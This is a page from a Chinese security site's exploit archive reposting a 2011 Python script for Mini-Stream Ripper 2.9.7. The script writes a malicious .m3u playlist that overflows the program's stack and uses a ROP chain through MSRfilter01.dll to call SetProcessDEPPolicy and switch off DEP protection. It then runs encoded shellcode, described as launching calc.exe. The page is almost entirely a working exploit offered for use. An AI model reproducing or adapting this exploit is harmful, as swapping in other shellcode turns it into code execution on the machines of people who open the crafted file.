首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mini-Stream Ripper 2.9.7 DEP Bypass
来源:vfocus.net 作者:Blake 发布时间:2011-09-19  

# written to bypass OptIn/OptOut DEP policy
# tested on windows xp sp3 running in virtualbox
import sys

print "\n============================"
print "Mini-Stream 2.9.7 DEP Bypass"
print "      Written by Blake      "
print "   Tested on Windows XP SP3 "
print "============================\n"
 
# calc.exe
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x36\x42\x50\x5a")
 
buffer = "\x41" * 26084
eip = "\x95\x3a\x02\x10" # RETN - MSRfilter01.dll
rop = "\x41" * 4   # compensate
rop += "\x54\x30\x01\x10" # POP EBX, RETN - MSRfilter01.dll
rop += "\xff\xff\xff\xff"
rop += "\x23\xda\x02\x10" # INC EBX, FPATAN, RETN - MSRfilter01.dll
rop += "\x8f\xaf\x01\x10" # POP EBP, RETN - MSRfilter01.dll
rop += "\xa4\x22\x86\x7c" # SetProcessDEPPolicy
rop += "\x8f\xf4\x01\x10" # POP EDI, RETN - MSRfilter01.dll
rop += "\x90\xf4\x01\x10" # RETN - MSRfilter01.dll
rop += "\xd5\x13\x01\x10" # POP ESI, RETN - MSRfilter01.dll
rop += "\x90\xf4\x01\x10" # RETN - MSRfilter01.dll
rop += "\x63\xf5\x01\x10" # PUSHAD, RETN - MSRfilter01.dll
nops = "\x90" * 100
junk = "\x43" * (4000 - len(shellcode + nops + rop))


print "[+] Creating malicious .m3u file"
try:
    file = open("exploit.m3u","w")
    file.write(buffer + eip + rop + nops + shellcode + junk)
    file.close()
    print "[+] File created"
except:
    print "[x] Could not create file"
 
raw_input("\nPress any key to exit...\n")


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Measuresoft ScadaPro <= 4.0.0
·RealNetworks Realplayer QCP Pa
·webadmin <= Shell Upload Vulne
·MY MP3 Player 3.0 m3u Exploit
·Audio Gold Local Buffer Overfl
·KnFTP 1.0.0 Server Multiple Bu
·Audio Editor Deluxe (.m3u File
·Audio Gold Local Buffer Overfl
·Nortel Contact Recording Centr
·Switch Media Editor(.m3u) Loca
·ALL IN 1 MOBILE VIDEO Denial o
·ScadaTEC ScadaPhone <= v5.3.11
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved